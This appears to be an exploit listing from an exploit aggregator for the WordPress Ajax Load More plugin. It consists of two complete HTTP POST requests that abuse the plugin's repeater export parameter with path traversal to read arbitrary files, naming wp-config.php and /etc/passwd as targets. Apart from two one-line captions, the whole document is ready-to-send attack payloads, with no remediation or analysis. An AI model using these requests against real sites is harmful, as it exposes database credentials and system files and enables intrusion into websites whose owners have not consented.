## https://sploitus.com/exploit?id=WPEX-ID:3207BBEA-B4DC-4AE0-8A48-D7089BA7107F
Get arbitrary PHP files, such as wp-config.php
POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
alm_repeaters_export_type=a&alm_repeaters_export=1&alm_repeaters_export_name=../../../wp-config
Get arbitrary files (requires the alm_templates folder to exist inside the active theme, or a web server not needing intermediary folders to exist, such as IIS)
POST /wp-admin/admin.php?page=ajax-load-more-repeaters HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Connection: close
Cookie: [admin+]
alm_repeaters_export_type=theme-repeater&alm_repeaters_export=1&alm_repeaters_export_name=../../../../../../../etc/passwd